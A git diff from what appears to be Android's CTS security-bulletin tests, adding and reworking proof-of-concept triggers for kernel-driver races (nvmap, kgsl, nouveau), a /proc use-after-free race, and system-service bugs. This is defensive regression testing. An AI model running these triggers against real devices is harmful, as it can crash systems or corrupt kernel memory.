+ __attribute__((unused)) char *const argv[]) {
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> service = sm->checkService(String16("activity"));
+ if (service != NULL) {
+ printf("heap corruption\n");
+ transact(service, HEAPCORRUPT);
+ } else {
+ printf("get activitymanger failed\n");
+ }
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/Android.mk
deleted file mode 100644
index 204ace1..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/Android.mk
+++ /dev/null
@@ -1,32 +0,0 @@
-# Copyright (C) 2016 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-8424
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests sts
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS := -Wno-unused-parameter -Wall -Werror
-LOCAL_CFLAGS += -Wno-incompatible-pointer-types -Wno-unused-variable
-LOCAL_LDFLAGS += -fPIE -pie
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/poc.c
deleted file mode 100644
index 4460b88..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8424/poc.c
+++ /dev/null
@@ -1,138 +0,0 @@
-/*
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#define _GNU_SOURCE
-
-#include <stdlib.h>
-#include <errno.h>
-#include <unistd.h>
-#include <stdio.h>
-#include <dirent.h>
-#include <string.h>
-#include <sys/stat.h>
-#include <sys/ioctl.h>
-#include <stdio.h>
-#include <string.h>
-#include <dlfcn.h>
-#include <sys/time.h>
-#include <sys/mman.h>
-#include <sys/syscall.h>
-#include <sys/resource.h>
-#include <fcntl.h>
-#include <pthread.h>
-#include <unistd.h>
-#include <sched.h>
-
-
-struct nvmap_handle_param {
- __u32 handle; /* nvmap handle */
- __u32 param; /* size/align/base/heap etc. */
- unsigned long result; /* returns requested info*/
-};
-
-struct nvmap_create_handle {
- union {
- __u32 id; /* FromId */
- __u32 size; /* CreateHandle */
- __s32 fd; /* DmaBufFd or FromFd */
- };
- __u32 handle; /* returns nvmap handle */
-};
-
-#define NVMAP_IOC_MAGIC 'N'
-#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
-#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
-#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
-#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
-#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
-
-int g_fd = -1;
-static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
-static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
-struct nvmap_create_handle* g_allocation = NULL;
-
-int open_driver() {
- char* dev_path = "/dev/nvmap";
- g_fd = open(dev_path, O_RDWR);
- if (g_fd < 0) {
- printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
- } else {
- printf("[*] open file(%s) succ!\n", dev_path);
- }
- return g_fd;
-}
-
-void trigger_nvmap_create() {
- ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
- //printf("[*] NVMAP_IOC_CREATE, fd(%d), last error = %d\n", g_allocation->handle, errno);
-}
-
-void trigger_nvmap_free() {
- static int data = 1024;
- ioctl(g_fd, NVMAP_IOC_FREE, data);
- //printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
-}
-
-void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
- setpriority(PRIO_PROCESS, gettid(), privi);
- printf("[*] setpriority(%d) errno = %d\n", privi, errno);
-
- /* bind process to a CPU*/
- if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
- printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
- }
-}
-
-void prepare_data() {
- void* data = calloc(1, 0x1000);
-
- g_allocation = (struct nvmap_create_handle*)data;
- g_allocation->size = 1024;
-
- mprotect(data, 0x1000, PROT_READ);
- printf("[*] mprotect, error = %d\n", errno);
-}
-static int init = 0;
-void* race_thread(void* arg) {
- setup_privi_and_affinity(0, 2);
-
- int i;
- while (1) {
- if (init == 0) {
- pthread_mutex_lock(&mutex);
- pthread_cond_wait(&cond, &mutex);
- pthread_mutex_unlock(&mutex);
- init = 1;
- }
- trigger_nvmap_free();
- }
-}
-
-int main(int argc, char**argv) {
- setup_privi_and_affinity(0, 1);
- if (open_driver() < 0) {
- return -1;
- }
- prepare_data();
- pthread_t tid;
- pthread_create(&tid, NULL, race_thread, NULL);
- sleep(1);
- while (1) {
- if (init == 0)
- pthread_cond_signal(&cond);
- trigger_nvmap_create();
- }
- return 0;
-}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8479/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8479/poc.c
index 94202f6..5d4950a 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8479/poc.c
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8479/poc.c
@@ -26,6 +26,7 @@
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
+#include "../includes/common.h"
#define THREAD_NUM 600
#define DEV "/dev/kgsl-3d0"
@@ -124,39 +125,46 @@
void* child_ioctl_0(void* no_use) {
int ret = 1;
+ time_t test_started = start_timer();
struct kgsl_drawctxt_destroy kdd = {0};
kdd.drawctxt_id = kgsl_id;
set_affinity(1);
- while (1) {
+ while (timer_active(test_started)) {
ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &kdd);
}
+ return NULL;
}
void* child_ioctl_1(void* no_use) {
int ret = 1;
+ time_t test_started = start_timer();
struct kgsl_drawctxt_destroy kdd = {0};
kdd.drawctxt_id = kgsl_id;
set_affinity(2);
- while (1) {
+ while (timer_active(test_started)) {
ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &kdd);
}
+ return NULL;
}
void* child_ioctl_2(void* no_use) {
int ret = 1;
+ time_t test_started = start_timer();
struct kgsl_drawctxt_create kdc = {0, 0};
kdc.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
set_affinity(3);
- while (1) {
+ while (timer_active(test_started)) {
ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &kdc);
kgsl_id = kdc.drawctxt_id;
}
+ return NULL;
}
int main() {
int i, ret;
+ time_t test_started = start_timer();
struct kgsl_drawctxt_create kdc = {0, 0};
kdc.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
struct kgsl_drawctxt_destroy kdd = {0};
@@ -179,8 +187,12 @@
pthread_create(thread_id + i + 2, NULL, child_ioctl_2, NULL);
}
- while (1) {
+ while (timer_active(test_started)) {
ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &kdc);
kgsl_id = kdc.drawctxt_id;
}
+
+ close(fd);
+
+ return 0;
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/Android.mk
old mode 100755
new mode 100644
similarity index 73%
rename from hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/Android.mk
rename to hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/Android.mk
index 65fe025..e3884e6
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/Android.mk
@@ -4,7 +4,7 @@
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
-# http://www.apache.org/licenses/LICENSE-2.0
+# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
@@ -15,22 +15,26 @@
LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2015-8839
-LOCAL_SRC_FILES := poc.c
-
-LOCAL_SHARED_LIBRARIES := libcutils \
- liblog
+LOCAL_MODULE := CVE-2017-0415
+LOCAL_SRC_FILES := poc.cpp
LOCAL_MULTILIB := both
LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+LOCAL_SHARED_LIBRARIES := libutils \
+ libui \
+ libgui \
+ libmedia
+
+LOCAL_C_INCLUDES:= \
+ $(TOP)/frameworks/native/include/media/openmax
+
# Tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts sts
LOCAL_CTS_TEST_PACKAGE := android.security.cts
LOCAL_ARM_MODE := arm
LOCAL_CFLAGS += -Wall -Werror
-LOCAL_LDFLAGS += -fPIE -pie
-LOCAL_LDFLAGS += -rdynamic
+
include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/poc.cpp
new file mode 100644
index 0000000..37e3ca7
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/poc.cpp
@@ -0,0 +1,74 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <gui/BufferQueue.h>
+#include <gui/IGraphicBufferProducer.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <ui/Fence.h>
+#include <utils/String8.h>
+
+using namespace android;
+
+#define MAX_TRY 5000 // based on experiments
+volatile int quit = 1;
+
+static void *start2(void *args) {
+ sp<IGraphicBufferProducer> bufferProducer =
+ *(sp<IGraphicBufferProducer> *)args;
+
+ /*
+ * It will end when ever the main thread exits due to
+ * two conditions.
+ * 1. count value reaches less than 0
+ * 2. Transact failed
+ */
+ while (quit) {
+ int buffer;
+ sp<Fence> fence;
+ bufferProducer->dequeueBuffer(&buffer, &fence, 800, 600, 1, 0, nullptr,
+ nullptr);
+ }
+ return NULL;
+}
+
+int main(__attribute__((unused)) int argc,
+ __attribute__((unused)) char *const argv[]) {
+ int count = MAX_TRY;
+ int result = EXIT_SUCCESS;
+ sp<IGraphicBufferProducer> bufferProducer = NULL;
+ sp<IGraphicBufferConsumer> bufferConsumer = NULL;
+
+ pthread_t thread;
+ pthread_create(&thread, NULL, start2, &bufferProducer);
+
+ while (quit) {
+ bufferConsumer->setConsumerName(String8("dddddddddddddddd"));
+ String8 str = bufferProducer->getConsumerName();
+ if (count < 0) {
+ quit = 0;
+ }
+ if (!strcmp("TransactFailed", str.string())) {
+ result = EXIT_FAILURE;
+ quit = 0;
+ }
+ count--;
+ }
+ pthread_join(thread, NULL);
+
+ return result;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/Android.mk
old mode 100755
new mode 100644
similarity index 79%
copy from hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
copy to hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/Android.mk
index 5e53ee5..498e85f
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/Android.mk
@@ -4,30 +4,29 @@
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
-# http://www.apache.org/licenses/LICENSE-2.0
+# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
-# limitations under the License.
+# limitations under the License
+
LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-2062
+LOCAL_MODULE := CVE-2017-0477
LOCAL_SRC_FILES := poc.c
LOCAL_MULTILIB := both
LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-LOCAL_SHARED_LIBRARIES := liblog
-
-# Tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts sts vts
LOCAL_CTS_TEST_PACKAGE := android.security.cts
LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS += -Wall -Werror
+LOCAL_CFLAGS = -Wall -Werror
include $(BUILD_CTS_EXECUTABLE)
+
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/poc.c
new file mode 100644
index 0000000..5a7baa7
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0477/poc.c
@@ -0,0 +1,63 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <dlfcn.h>
+#include <string.h>
+#include <sys/mman.h>
+
+typedef struct {
+ uint32_t width;
+ uint32_t height;
+ uint32_t format;
+ const unsigned char* pixels;
+} gdx2d_pixmap;
+
+gdx2d_pixmap *(*gdx2d_load)(const unsigned char *buffer, uint32_t len);
+void (*gdx2d_free)(const gdx2d_pixmap* pixmap);
+
+int main() {
+ void *libgdx = dlopen("libgdx.so", RTLD_LAZY);
+ if(libgdx == NULL) {
+ return -1;
+ }
+ gdx2d_load = dlsym(libgdx, "gdx2d_load");
+ gdx2d_free = dlsym(libgdx, "gdx2d_free");
+ if(gdx2d_load == NULL || gdx2d_free == NULL){
+ dlclose(libgdx);
+ return -2;
+ }
+
+ char *fname = "/data/local/tmp/CVE-2017-0477.gif";
+ int fd = open(fname, O_RDONLY);
+ struct stat st;
+ fstat(fd, &st);
+ void *ptr = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
+
+ gdx2d_pixmap *pixmap = gdx2d_load((unsigned char *) ptr, st.st_size);
+ if (pixmap) {
+ gdx2d_free(pixmap);
+ }
+ dlclose(libgdx);
+ return 0;
+}
+
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/Android.mk
index b4697d5..64ecb5c 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/Android.mk
@@ -10,7 +10,7 @@
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
-# limitations under the License.
+# limitations under the License
LOCAL_PATH := $(call my-dir)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/poc.c
index 1637bd6..5bdd33d 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/poc.c
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/poc.c
@@ -10,26 +10,25 @@
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions vand
+ * See the License for the specific language governing permissions and
* limitations under the License.
*/
#define _GNU_SOURCE
-#include "local_poc.h"
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
-#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
+#include "local_poc.h"
+#include "../includes/common.h"
#define DRMDEV_NAME "/dev/dri/renderD128"
+#define MAX_MAPS 10
-static int drm_version(int fd)
-{
- int ret;
+static int drm_version(int fd) {
struct drm_version ver;
ver.name_len = 100;
ver.date_len = 100;
@@ -39,17 +38,14 @@
ver.date = (char*)malloc(ver.date_len);
ver.desc = (char*)malloc(ver.desc_len);
- ret = ioctl(fd, DRM_IOCTL_VERSION, &ver);
-
- if (ret == -1) {
- return -1;
+ if (ioctl(fd, DRM_IOCTL_VERSION, &ver) < 0) {
+ close(fd);
+ exit(EXIT_FAILURE);
}
return 0;
}
-static int nouveau_gem_ioctl_new(int fd)
-{
- int ret;
+static uint32_t nouveau_gem_ioctl_new(int fd) {
struct drm_nouveau_gem_new new_arg;
memset(&new_arg, 0, sizeof(new_arg));
@@ -57,66 +53,43 @@
new_arg.info.size = 0x1000;
new_arg.info.domain = NOUVEAU_GEM_DOMAIN_GART;
- ret = ioctl(fd, DRM_IOCTL_NOUVEAU_GEM_NEW, &new_arg);
- if (ret == -1) {
- return -1;
+ if (ioctl(fd, DRM_IOCTL_NOUVEAU_GEM_NEW, &new_arg) < 0) {
+ close(fd);
+ exit(EXIT_FAILURE);
}
-
return new_arg.info.handle;
}
-static uint32_t get_gem_map_handle(int fd)
-{
- uint32_t handle;
-
- handle = nouveau_gem_ioctl_new(fd);
-
- return handle;
-}
-
-static void nouveau_gem_ioctl_map(int fd, uint32_t handle)
-{
- int ret;
+static void nouveau_gem_ioctl_map(int fd, uint32_t handle) {
struct drm_nouveau_gem_map map_arg;
memset(&map_arg, 0, sizeof(map_arg));
map_arg.handle = handle;
map_arg.length = 0x1000;
- ret = ioctl(fd, DRM_IOCTL_NOUVEAU_GEM_MAP, &map_arg);
- if (ret == -1) {
- return;
+ if (ioctl(fd, DRM_IOCTL_NOUVEAU_GEM_MAP, &map_arg) < 0) {
+ close(fd);
+ exit(EXIT_FAILURE);
}
}
-void poc()
-{
+int main() {
int fd;
- const int MAX_MAPS = 10;
+ time_t test_started = start_timer();
- fd = open(DRMDEV_NAME, O_RDWR);
- if (fd == -1) {
- return;
+ while (timer_active(test_started)) {
+ fd = open(DRMDEV_NAME, O_RDWR);
+ if (fd < 0) {
+ return -1;
+ }
+
+ drm_version(fd);
+
+ uint32_t handle = nouveau_gem_ioctl_new(fd);
+
+ for (int i = 0; i < MAX_MAPS; i++) {
+ nouveau_gem_ioctl_map(fd, handle);
+ }
+ close(fd);
}
-
- if (drm_version(fd) == -1){
- return;
- }
-
- uint32_t handle = get_gem_map_handle(fd);
-
- for(int i = 0; i < MAX_MAPS; i++){
- nouveau_gem_ioctl_map(fd, handle);
- }
- close(fd);
-
- return;
-}
-
-int main()
-{
- const int MAX_RUNS = 30000;
-
- for(int i = 0; i < MAX_RUNS; i++) {
- poc();
- }
+ return 0;
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/Android.mk
index 4a4301f..a6a520f 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/Android.mk
@@ -25,7 +25,7 @@
libpac \
# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
LOCAL_CTS_TEST_PACKAGE := android.security.cts
LOCAL_ARM_MODE := arm
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/Android.mk
old mode 100755
new mode 100644
similarity index 78%
copy from hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
copy to hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/Android.mk
index 5e53ee5..3c8d79c
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/Android.mk
@@ -4,7 +4,7 @@
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
-# http://www.apache.org/licenses/LICENSE-2.0
+# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
@@ -15,19 +15,16 @@
LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-2062
+LOCAL_MODULE := CVE-2018-9515
LOCAL_SRC_FILES := poc.c
LOCAL_MULTILIB := both
LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-LOCAL_SHARED_LIBRARIES := liblog
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
LOCAL_CTS_TEST_PACKAGE := android.security.cts
LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS += -Wall -Werror
+LOCAL_CFLAGS := -Wall -Werror
include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/poc.c
new file mode 100644
index 0000000..a89d596
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/poc.c
@@ -0,0 +1,75 @@
+#define _GNU_SOURCE
+#include <pthread.h>
+#include <err.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <string.h>
+#include <time.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include "../includes/common.h"
+
+pid_t looper_pid;
+
+void *uaf_worker(__attribute__ ((unused)) void *unused) {
+ char cwd_path[100];
+ sprintf(cwd_path, "/proc/self/task/%d/cwd", (int)looper_pid);
+
+ time_t timer = start_timer();
+ while (timer_active(timer)) {
+ char symlink_target[1000];
+ int len = readlink(cwd_path, symlink_target, sizeof(symlink_target)-1);
+ if (len > 0) {
+ symlink_target[len] = 0;
+ }
+ }
+
+ return NULL;
+}
+
+void *chaos_worker(__attribute__ ((unused)) void *unused) {
+ if (chdir("/sdcard/Android/data/CVE-2018-9515"))
+ err(1, "chdir");
+ rmdir("subdir");
+
+ time_t timer = start_timer();
+ while (timer_active(timer)) {
+ if (mkdir("subdir", 0777))
+ err(1, "mkdir");
+ if (chdir("subdir"))
+ err(1, "chdir");
+ if (rmdir("../subdir"))
+ err(1, "rmdir");
+ if (chdir(".."))
+ err(1, "chdir");
+ }
+
+ return NULL;
+}
+
+int main(void) {
+ looper_pid = syscall(__NR_gettid);
+
+ pthread_t thread;
+ if (pthread_create(&thread, NULL, uaf_worker, NULL))
+ errx(1, "pthread_create failed");
+
+ pthread_t thread2;
+ if (pthread_create(&thread2, NULL, chaos_worker, NULL))
+ errx(1, "pthread_create failed");
+
+ char my_dir_name[100];
+ sprintf(my_dir_name, "/sdcard/Android/data/CVE-2018-9515/foobar");
+ rmdir(my_dir_name);
+
+ time_t timer = start_timer();
+ while (timer_active(timer)) {
+ if (mkdir(my_dir_name, 0777))
+ err(1, "looper: mkdir");
+ if (rmdir(my_dir_name))
+ err(1, "looper: rmdir");
+ }
+
+ return 0;
+}
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/AndroidManifest.xml b/hostsidetests/securitybulletin/securityPatch/includes/common.h
similarity index 61%
copy from tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/AndroidManifest.xml
copy to hostsidetests/securitybulletin/securityPatch/includes/common.h
index 84ba0ed..6800dc9 100644
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/AndroidManifest.xml
+++ b/hostsidetests/securitybulletin/securityPatch/includes/common.h
@@ -1,5 +1,4 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!--
+/**
* Copyright (C) 2018 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
@@ -13,14 +12,26 @@
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
- -->
+ */
-<manifest xmlns:android="http://schemas.android.com/apk/res/android"
- package="android.permission.cts.revokepermissionwhenremoved.userapp">
+#ifndef COMMON_H
+#define COMMON_H
- <uses-permission android:name="android.permission.cts.revokepermissionwhenremoved.TestPermission" />
+#include <time.h>
+#define MAX_TEST_DURATION 300
- <application>
- </application>
-</manifest>
+// exit status code
+#define EXIT_VULNERABLE 113
+time_t start_timer(void);
+int timer_active(time_t timer_started);
+
+time_t start_timer(){
+ return time(NULL);
+}
+
+int timer_active(time_t timer_started){
+ return time(NULL) < (timer_started + MAX_TEST_DURATION);
+}
+
+#endif /* COMMON_H */
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
index cb3babd..b9f3b2b 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
@@ -20,18 +20,15 @@
import com.android.tradefed.device.CollectingOutputReceiver;
import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
-import com.android.tradefed.testtype.DeviceTestCase;
import com.android.tradefed.log.LogUtil.CLog;
-import android.platform.test.annotations.RootPermissionTest;
-
import java.io.BufferedOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
-import java.util.Scanner;
import java.util.concurrent.TimeUnit;
+import java.util.Scanner;
import static org.junit.Assert.*;
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java b/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java
new file mode 100644
index 0000000..cd39c56
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java
@@ -0,0 +1,230 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+import com.android.tradefed.device.BackgroundDeviceAction;
+
+import android.platform.test.annotations.RootPermissionTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+import java.util.regex.Pattern;
+import java.util.regex.Matcher;
+import java.util.Map;
+import java.util.HashMap;
+import java.util.concurrent.ConcurrentHashMap;
+import com.android.ddmlib.MultiLineReceiver;
+import com.android.ddmlib.Log;
+import com.android.ddmlib.TimeoutException;
+import java.lang.ref.WeakReference;
+
+/**
+ * A utility to monitor the device lowmemory state and reboot when low. Without this, tests that
+ * cause an OOM can sometimes cause ADB to become unresponsive indefinitely. Usage is to create an
+ * instance per instance of SecurityTestCase and call start() and stop() matching to
+ * SecurityTestCase setup() and teardown().
+ */
+public class HostsideOomCatcher {
+
+ private static final String LOG_TAG = "HostsideOomCatcher";
+
